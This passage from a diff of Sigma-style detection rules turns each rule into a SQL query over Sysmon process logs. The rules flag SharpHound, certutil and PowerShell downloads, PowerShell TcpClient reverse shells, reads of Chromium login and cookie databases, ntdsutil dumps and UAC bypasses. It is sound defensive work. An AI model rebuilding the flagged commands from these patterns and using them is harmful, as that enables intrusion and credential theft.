ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Monitoring For Persistence Via BITS", - "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", + "title": "Suspicious File Characteristics Due to Missing Fields", + "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "status": "test", - "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", - "author": "Sreeman", + "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", + "author": "Markus Neis, Sander Wiebing", "tags": [ - "attack.defense_evasion", - "attack.t1197" + "attack.execution", + "attack.t1059.006" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" + "filename": "proc_creation_win_susp_file_characteristics.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "title": "Remote Code Execute via Winrm.vbs", + "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" + "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" }, { - "title": "Application Whitelisting Bypass via Dnx.exe", - "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", - "status": "test", - "description": "Execute C# code located in the consoleapp folder", - "author": "Beyu Denis, oscd.community", + "title": "Suspicious Msbuild Execution By Uncommon Parent Process", + "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "status": "experimental", + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1027.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of dnx.exe by legitimate user" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnx.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentImage LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nuget.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dnx.yml" + "filename": "proc_creation_win_msbuild_susp_parent_process.yml" }, { - "title": "Suspicious Extrac32 Execution", - "id": "aa8e035d-7be4-48d3-a944-102aec04400d", - "status": "experimental", - "description": "Download or Copy file with Extrac32", + "title": "Suspicious Execution of Shutdown", + "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "status": "test", + "description": "Use of the commandline to shutdown or reboot windows", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1529" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR Image LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_extrac32.yml" + "filename": "proc_creation_win_shutdown_execution.yml" }, { - "title": "Remote Access Tool - NetSupport Execution", - "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", + "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.discovery", + "attack.t1087.001" ], "falsepositives": [ - "Legitimate use" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport.yml" + "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" }, { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", - "status": "experimental", - "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects the execution of a renamed office binary", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", + "title": "File Download Via Curl.EXE", + "id": "9a517fca-4ba3-4629-9278-a68694697b81", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects file download using curl.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins", + "Administrative activity", + "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_curl_download.yml" }, { - "title": "Suspicious Reg Add Open Command", - "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "title": "Remote Access Tool - AnyDesk Execution", + "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", "status": "test", - "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" ], - "filename": "proc_creation_win_reg_open_command.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk.yml" }, { - "title": "Use of FSharp Interpreters", - "id": "b96b2031-7c17-4473-afe7-a30ce714db29", + "title": "Group Membership Reconnaissance Via Whoami.EXE", + "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "status": "experimental", - "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Legitimate use by a software developer." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR Image LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" + "filename": "proc_creation_win_whoami_groups_discovery.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "a58353df-af43-4753-bad0-cd83ef35eef5", "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Legitimate usage to restore snapshots", + "Legitimate admin activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_ntdsutil_susp_usage.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" + "filename": "proc_creation_win_hktl_sharp_chisel.yml" }, { - "title": "Suspicious Git Clone", - "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", - "status": "experimental", - "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.t1593.003" + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\git.exe' ESCAPE '\\' OR Image LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_git_susp_clone.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", + "status": "experimental", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1614.001" ], "falsepositives": [ - "Administrative might use this function to check network connectivity" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", + "title": "Node Process Executions", + "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "author": "Max Altgelt (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.t1127", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 